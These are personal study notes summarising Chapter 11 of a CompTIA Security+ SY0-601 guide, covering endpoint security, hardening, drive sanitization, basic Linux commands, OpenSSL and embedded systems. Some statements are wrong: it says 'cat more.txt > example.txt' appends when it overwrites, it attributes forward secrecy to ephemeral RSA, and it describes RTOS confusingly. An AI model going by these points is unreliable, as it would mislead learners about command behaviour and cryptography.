Comptia Security+ 601 Chapter 11 Summary

CompTIA Security+ Study Guide: Exam SY0-601 8th Edition, by Mike Chapple & David Seidl

Chapter 11 summary of my notes.

1. Endpoint Security

Endpoints = end point of a network(computer, phone)

Unified Extensible Firmware Interface (UEFI) firmware (the replacement for BIOS) can leverage two different techniques:

1. Secure boot ensures that the system boots using only software that the original equipment manufacturer (OEM) trusts.


2. Measured Boot = helps prevent boot-level malware. These boot processes measure each component, starting with the firmware and ending with the boot start drivers.

TPM chip = Hardware root of trust for a system contains the cryptographic keys that secure the boot process. They provide three major functions:

1. Remote attestation = allowing hardware and software configurations to be verified


2. Binding = encrypts data


3. Sealing = encrypts data and sets requirements for the state of the TPM chip before decryption

HSMs, Hardware security modules, = external devices or plug-in cards used to create, store, and manage digital keys for cryptographic functions and authentication,

Here are the most common methods that detect malicious software and applications:

1. Signature-based detection, which uses a hash or other signature generation method to identify files or components of the malware that have been previously observed.


2. Heuristic-, or behavior-based detection, looks at what actions the malicious software takes and matches them to profiles of unwanted activities.


3. AI and machine learning systems that leverage large amounts of data to find ways to identify malware that may include heuristic, signature, and other detection capabilities.


4. Sandboxing is used by some tools and by the antimalware vendors themselves to isolate and run sample malicious code.


5. Endpoint detection and response, EDR, tools combine monitoring capabilities on endpoint device and systems using a client or software agent with network monitoring and log analysis capabilities to collect, correlate, and analyze events. They look for anomalies and indicators of compromise, IoCs, using automated rules and detection engines as well as allowing manual investigation.

Data loss prevention, DLP, tools are deployed to endpoints in the form of clients or applications. These tools also commonly have network and server-resident components to ensure that data is managed throughout its lifecycle. Key elements of DLP systems:

1. Classify data so that organizations know which data should be protected; data labeling or tagging functions,


2. Support classification and management practices.


3. Policy management and enforcement functions used to manage data to the standards set by the organization.


4. Monitoring and reporting capabilities, to quickly notify administrators or security practitioners about issues or potential problems.

DLP systems can also track user behaviors to identify questionable behavior or common mistakes like assigning overly broad permissions.

Host intrusion prevention system, HIPS, analyzes traffic before services or applications on the host process it. A HIPS can actively block traffic, misidentification of traffic as malicious, misconfiguration, or other issues can cause legitimate traffic to be blocked, potentially causing an outage.

A host intrusion detection system, HIDS, performs similar functions but, like a traditional intrusion detection system (IDS) it cannot take action to block traffic. Instead, a HIDS can only report and alert on issues.

Features that are consistent among many firewall devices that claim the title of next-generation firewalls:

1. Built-in IPS or IDS functionality, which can analyze traffic for attacks and either take action or alert on it. Antimalware and antivirus features that allow them to scan traffic


2. Geo-IP and geolocation capability to match threats with real-world locations


3. Proxying, which allows the device to intercept traffic and analyze it by sitting in the middle of encrypted web traffic Web application firewall capabilities designed to protect web applications Sandboxing

Hardening = involves changing settings on the system to increase its overall level of security.

Security+ exam outline lists open ports and services, the registry, disk encryption, operating system, and patch management, including both third-party updates and auto-update as part of a hardening process.

The best option for unneeded services is to disable them entirely. In Windows you can use the Services.msc to do this.

Windows registry = core of how Windows tracks what is going on. The registry is thus an important target for attackers, who can use it to automatically start programs, gather information, or otherwise take malicious action on a target machine.

Naming conventions play a number of roles:  

1. They can help you identify systems based on purpose, location, or other elements included in the naming convention.


2. They can be used to make systems more anonymous; examplecorp123 is less meaningful to an attacker than examplesqlserver or examplewebserver.


3. They make scripting and management easier because you can filter, sort, and take other actions more easily using a standard naming convention.

Standardized Internet Protocol, IP.

Segmenting systems based on purpose, location, or other factors and ensuring that you are managing the IP address space that your organization uses help you avoid address collisions, avoid running out of addresses in network segments, and identify systems that shouldn't be using a given address.

Full-disk encryption, FDE, encrypts the disk and requires that the bootloader or a hardware device provide a decryption key and software or hardware to decrypt the drive for use.

Self-encrypting drive, SED, = implement encryption capabilities in their hardware and firmware. Systems equipped with a self-encrypting drive require a key to boot from the drive, which may be entered manually or provided by a hardware token or device.

Sanitizing drives or media involves one of two processes: wiping the data or destroying the media.

Degausser, which exposes the magnetic media to very strong electromagnetic fields, scrambling the patterns of bits written to the drive. Degaussers are a relatively quick way to destroy the data on magnetic media. SSDs, optical media and drives, and flash drives, however, require different handling.

For hard drives and other magnetic media, this may be accomplished with a series of writes, typically of 1s or 0s, to every storage location (bit) on the drive. Various tools like Darik's Boot and Nuke (DBAN) will perform multiple passes over an entire disk to attempt to ensure that no data remains.

Data remanence, or data that is still on a disk after the fact, is a significant concern, particularly with SSD and other flash media that uses wear-leveling algorithms to spread wear and tear on the drive over more space than the listed capacity.

Wiping SSDs using a traditional drive wipe utility that writes to all accessible locations will miss sections of the disk where copies of data may remain due to the wear-leveling process.

Better solution = use full-disk encryption for the full life of a drive and then simply discard the encryption key when the data is ready to be retired. Unless your organization faces advanced threats, this approach is likely to keep the data from being recoverable by even reasonably advanced malicious actors.

The Security+ exam focuses on six command-line tools:

1. head is a command that shows you the first part of a file. By default, it will show you the first 10 lines of a file, making it a handy tool to quickly see what a file contains.


2. tail is very similar to the head command, but it displays the last 10 lines of a file by default. tail is often used to view recent log entries or other data in a file that is changing.


3. cat, short for concatenate, can be used to output files to standard output (your console) or to append files to other files. Typing cat example.txt will display the contents of example.txt to your console. Typing cat more.txt > example.txt will add the contents of more.txt to the file example.txt.


4. grep is a search tool that allows you to search for patterns that match provided text or regular expressions. In its most basic form, you can search for a word by typing grep 'word' /file/location, replacing word with the word or text string you want to find,


5. chmod lets you set permissions on files and directories, using either a symbol or a numeric representation of the permissions that you want to set. Set read, write, and execute for example.txt, you could issue the command chmod 777 example.txt.


6. logger is the most obscure of the commands that the Security+ exam includes. The logger command will append whatever information you provide as input to the/var/log/syslog file on the system. logger can also be used to add information from other commands or files to the syslog file by calling that command or file via logger.

The Security+ exam looks at remote access and two scripting environments that you should be aware of.

1. Secure Shell, or SSH, is an encrypted protocol used to connect to systems, typically via the command line. SSH is also the name of a client that uses the SSH protocol to create that connection.


2. A shell is a command-line user interface to an operating system. Windows users will be familiar with the command prompt (cmd.exe), and Linux and macOS users will likely be familiar with Bash or another common shell. Shell scripts, or scripts that can be run using the shell, are a tool frequently employed by users and administrators to carry out tasks.


3. PowerShell scripts and commands allow management and configuration of Windows systems from the command line. PowerShell can report on the current state of the system, make changes both locally and to remote systems, and has many other features that make it a favorite tool for both attackers and defenders.

The final tool that the Security+ exam focuses on in this section = OpenSSL. OpenSSL isn't a shell, and it isn't a scripting language. Instead, much like SSH, OpenSSL is an implementation of the TLS protocol and is often used to protect other services. OpenSSL's TLS implementation is used for HTTPS traffic.

The Security+ exam expects you to know how to use OpenSSL as part of assessing organizational security. For a security analyst, that will most often include looking for places where secure communications are needed but absent, or where OpenSSL is misconfigured.

One of the key elements of the TLS protocol is that it provides for ephemeral RSA key exchange to create perfect forward secrecy.

Embedded systems are computer systems that are built into other devices such as industrial machinery, appliances, and cars.

Embedded systems use a real-time operating system, RTOS, = processing data as it comes in rather than using interrupts for the operating system.

The Security+ exam outline focuses on three specific types of systems that it lists as embedded systems.

1. Raspberry Pi = single-board computers which includes network connectivity, storage, video output, input, CPU and memory.


2. Arduinos, unlike the Raspberry Pi, = a microcontroller. They include a lower-power CPU with a small amount of memory and storage, and they provide input and output capabilities.


3. Field-programmable gate array, FPGA, = a type of computer chip that can be programmed to redesign how it works, allowing it to be a customizable chip.

Assessing embedded systems:

1. Identify the manufacturer or type of embedded system and acquire documentation or other materials about it.


2. Determine how the embedded system interfaces with the world: does it connect to a network, to other embedded devices, or does it only have a keyboard or other physical interface?


3. If there is a network connection, identify any services or access to it provided through that network connection, and how you can secure those services or the connection itself.


4. Learn about how the device is updated, if patches are available, and how and when those patches should be installed.